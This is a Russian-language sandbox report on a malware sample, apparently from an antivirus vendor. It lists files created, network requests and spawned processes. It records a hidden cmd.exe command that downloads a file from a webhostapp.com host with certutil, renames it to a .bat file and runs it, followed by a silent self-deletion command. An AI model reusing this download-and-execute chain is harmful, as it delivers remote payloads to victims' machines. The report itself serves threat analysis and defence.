Техническая информация
Изменения в файловой системе
Создает следующие файлы
- <PATH_SAMPLE>.hwp
Самоудаляется.
Сетевая активность
TCP
Запросы HTTP GET
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
UDP
- DNS ASK 88#.###webhostapp.com
- DNS ASK microsoft.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c C: && cd %TEMP% && certutil -urlcache -split -f https://881.000webhostapp.com/1.txt && ren 1.txt 1.bat && 1.bat && exit' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del /f /q <Полный путь к файлу>' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL <PATH_SAMPLE>.hwp
- '<SYSTEM32>\cmd.exe' /c C: && cd %TEMP% && certutil -urlcache -split -f https://881.000webhostapp.com/1.txt && ren 1.txt 1.bat && 1.bat && exit
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://881.000webhostapp.com/1.txt
- '<SYSTEM32>\cmd.exe' /c del /f /q <Полный путь к файлу>
